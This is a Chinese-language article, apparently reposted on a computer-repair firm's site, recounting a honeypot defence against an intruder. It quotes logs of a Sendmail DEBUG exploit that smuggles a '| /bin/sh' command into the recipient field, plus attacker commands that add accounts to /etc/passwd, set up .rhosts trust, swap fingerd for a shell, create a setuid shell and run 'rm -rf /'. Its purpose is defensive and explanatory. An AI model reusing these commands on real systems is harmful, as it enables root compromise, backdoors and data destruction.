网络欺骗方法及攻防实例

  不过，对于高手来说，这招并不一定能奏效。上面的日记，记录了两个邮件发送器的互相对话，整个生理历程可以从中窥伺出来。
  00:43:10 smtpd[27466]: <--- 220 xxx.xxx.com SMTP
  00:43:14 smtpd[27466]: -------> debug
  00:43:14 smtpd[27466]: DEBUG attempt
  00:43:14 smtpd[27466]: <--- 200 OK
  00:43:25 smtpd[27466]: -------> mail from:
  00:43:25 smtpd[27466]: <--- 503 Expecting HELO
  00:43:34 smtpd[27466]: -------> helo
  00:43:34 smtpd[27466]: HELO from
  00:43:34 smtpd[27466]: <--- 250 xxx.xxx.com
  00:43:42 smtpd[27466]: -------> mail from: 
  00:43:42 smtpd[27466]: <--- 250 OK
  00:43:59 smtpd[27466]: -------> rcpt to: 00:43:59 smtpd[27466]: <--- 501 Syntax error in recipient name
  00:44:44 smtpd[27466]: -------> rcpt to:<|sed -e ’1,/?$/’d | /bin/sh ; exit 0">
  00:44:44 smtpd[27466]: shell characters: |sed -e ’1,/?$/’d | /bin/sh ; exit 0"
  00:44:45 smtpd[27466]: <--- 250 OK
  00:44:48 smtpd[27466]: -------> data
  00:44:48 smtpd[27466]: <--- 354 Start mail input; end with .
  00:45:04 smtpd[27466]: <--- 250 OK
  00:45:04 smtpd[27466]: /dev/null sent 48 bytes to upas.security
  00:45:08 smtpd[27466]: -------> quit
  00:45:08 smtpd[27466]: <--- 221 xxx.xxx.com Terminating
  00:45:08 smtpd[27466]: finished. 
  这是我们对SMTP历程的日记。在这个例子中，另一端是由人来键入命令。入侵者尝试的第一个命令是DEBUG。当他接收的“250 OK”的回应时一定很惊异。要害的行是“rcpt to :”。在尖括号括起的部分通常是一个邮件接收器的地址。这里它包罗了一个命令行。在DEBUG形式下，Sendmail可以用它来以ROOT身份执行一段命令。即：
  sed -e ’1,/?$/’d | /bin/sh ; exit 0"
  它去掉了邮件头的信息，并使用ROOT身份执行了音讯体，如许可以隐蔽一些关于他的信息。之后，这个入侵者摸索着从我们的服务器上取得一些密码和账户文件，于是我们假造了一份假文件，给他发已往，密文破解后的意思是：“小心玩火自焚!”。
  4、寻踪
  如许几天没有动静，估计这个入侵者不死心，在思量该怎么来修正密码文件了。其实，到这一步，我们完全可以把机器的补丁打上，不过，玩就要玩个爽快。不过，我们也在纳闷，这个入侵者不会功成身退了吧，照旧有其他的工作在忙呢？静悄悄的，我们等待着。
  星期五的晚上，一个难得的周末。机房监控的终端陈诉有安全变乱，我们的入侵检测系统也时不时地陈诉有些错误产生。核对日记后，我们发明，有人试图使用DEBUG来用ROOT身份执行命令，也便是说，他试图修正我们的密码文件，一切尽在不言中，我不得不敬佩这个入侵者的耐心和智慧！查看日记，我们发明，这次入侵同样是来自前次的毗连：hust.whnet.edu。我们开始思考：现在到底是“诱敌深入”？照旧“引狼入室”？从觉得来看，这个黑客比我们想象中的要锋利，而且他对现在的系统和系统毛病相称的了解。难道我们要做的便是“拔掉网线”吗？思索中，一切仍旧在进行中。
  出于真实性思量，我们在采取一些信息利诱的同时，也公布了一些让黑客进入的诱饵。此中ftp的passwd是真实的，别的还天生了一个账号，但却使它不行操纵。同时，又要让入侵者以为他自己已经改变了passwd文件，但却不急于让他出去。因而还需要给这个入侵者创造一定的条件。于是，我天生了一个临时账号c，当它被挪用时就会给我发信，为了保险起见，我把c账号在现实passwd文件中改成了cndes，当我作完后，这个入侵者继续尝试：
  00:44 echo "cndes ::301:1::/:/bin/sh" >> /etc/passwd
  他尝试了几个命令，但是没有乐成，终于他发明了cndes这个账号，于是孕育产生了上面的日记：
  00:51 Attempt to login to inet with cndes from hust.whnet.edu
  00:51 Attempt to login to inet with cndes from hust.whnet.edu
  00:55 echo "cndes ::303:1::/tmp:/bin/sh" >> /etc/passwd
  00:57 (Added cndes to the real password file.)
  00:58 Attempt to login to inet with cndes from hust.whnet.edu
  00:58 Attempt to login to inet with cndes from hust.whnet.edu
  01:05 echo "36.92.0.205" >/dev/null
  echo "36.92.0.205 hust.whnet.edu">>/etc./?H?H?H
  01:06 Attempt to login to inet with guest from rice-chex.ai.mit.edu
  01:06 echo "36.92.0.205 hust.whnet.edu" >> /etc/hosts
  01:08 echo "hust.whnet.edu cndes">>/tmp/.rhosts 
  这时，这个入侵者的运动又转到了ftp上：
  Feb 20 01:36:48 inet ftpd[14437]: <--- 220 inet FTP server
  (Version 4.265 Fri Feb 2 13:39:38 EST 1990) ready.
  Feb 20 01:36:55 inet ftpd[14437]: -------> user cndes?M
  Feb 20 01:36:55 inet ftpd[14437]: <--- 331 Password required for cndes.
  Feb 20 01:37:06 inet ftpd[14437]: -------> pass?M
  Feb 20 01:37:06 inet ftpd[14437]: <--- 500 ’PASS’: command not understood.
  Feb 20 01:37:13 inet ftpd[14437]: -------> pass?M
  Feb 20 01:37:13 inet ftpd[14437]: <--- 500 ’PASS’: command not understood.
  Feb 20 01:37:24 inet ftpd[14437]: -------> HELP?M
  Feb 20 01:37:24 inet ftpd[14437]: <--- 214- The following commands are
  recognized (* =>’s unimplemented).
  Feb 20 01:37:24 inet ftpd[14437]: <--- 214 Direct comments to ftp-bugs@inet.
  Feb 20 01:37:31 inet ftpd[14437]: -------> QUIT?M
  Feb 20 01:37:31 inet ftpd[14437]: <--- 221 Goodbye.
  Feb 20 01:37:31 inet ftpd[14437]: Logout, status 0
  Feb 20 01:37:31 inet inetd[116]: exit 14437
  Feb 20 01:37:41 inet inetd[116]: finger request from 202.103.0.117 pid 14454
  Feb 20 01:37:41 inet inetd[116]: exit 14454
  01:38 finger attempt on cndes
  01:48 echo "36.92.0.205 hust.whnet.edu" >> /etc/hosts.equiv
  01:53 mv /usr/etc/fingerd /usr/etc/fingerd.b
  cp /bin/sh /usr/etc/fingerd 
  看的出，他在这方面是很外行的，幸运的是，他只是粉碎了我们模拟机器上的finger罢了，并没有将之替换成一个shell步伐。我封闭了现实fingerd步伐。黑客的运动仍旧在继续，摘录的相关日记如下：
  01:57 Attempt to login to inet with cndes from hust.whnet.edu
  01:58 cp /bin/csh /usr/etc/fingerd
  02:07 cp /usr/etc/fingerd.b /usr/etc/fingerd 
  按照他的意思，fingerd现在重新开始工作。现在他试图修正password，不过，这永远不会乐成，由于passwd的输入是/dev/tty，而不是sendmail所执行的shell script。攻击在继续中：
  02:16 Attempt to login to inet with cndes from hust.whnet.edu
  02:17 echo "/bin/sh" > /tmp/Shell
  chmod 755 /tmp/shell
  chmod 755 /tmp/Shell
  02:19 chmod 4755 /tmp/shell
  02:19 Attempt to login to inet with cndes from hust.whnet.edu
  02:19 Attempt to login to inet with cndes from hust.whnet.edu
  02:21 Attempt to login to inet with cndes from hust.whnet.edu
  02:21 Attempt to login to inet with cndes from hust.whnet.edu 
  又是一番折腾，连续的战斗，已经让我们疲乏不堪了，不过，这位入侵者也应该很疲乏了。突然，我发明了一个新的日记：
  02:55 rm -rf /&
  看来他试图删除全部进入的痕迹，估计他很累了。但是，对于这个黑客来说，“没有进行粉碎”是说不已往的，凭据计算机安全的基来源根基则，当数据的"完备性、可用性和秘密性"中恣意三者之一在受到粉碎的时间，都应视为安全受到了粉碎。在现实情况中，间谍们只是冷静地拿走你的数据而绝不做任何的粉碎，而且尽最大大概地掩饰笼罩自己行动的痕迹。这些黑客希望永劫间大量地得到宝贵的数据而不被觉察，这其实是最可怕的一种攻击举动。看来，今天遇到的这个黑客确实很职业，不过，他没有意识到我们给他部署的“局”，白费的永劫间攻击之后，他选择了退出。我们也很累了，不过，现在最要紧的，便是马上规复而且马上打上最新的sendmail系统补丁了。
  随着计算机安全技艺的发展，计算机网络将日益成为产业、农业和国防等方面的紧张信息互换手段，渗透到社会生存的各个领域。因而，认清网络的脆弱性和潜在要挟，采取强无力的安全计谋，对于保障网络的安全性将变得非常紧张。同时，计算机网络技艺现在正处于蓬勃发展的阶段，新技艺层出不穷，此中也不行制止地存在一些毛病，因而，进行网络防备要不停追踪新技艺的使用情况，同时要驾驭黑客的生理，做到“知己知彼，百战不殆”，从而逐渐美满自身的防备步伐。
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:

评论加载中... 内容： 评论者： 验证码：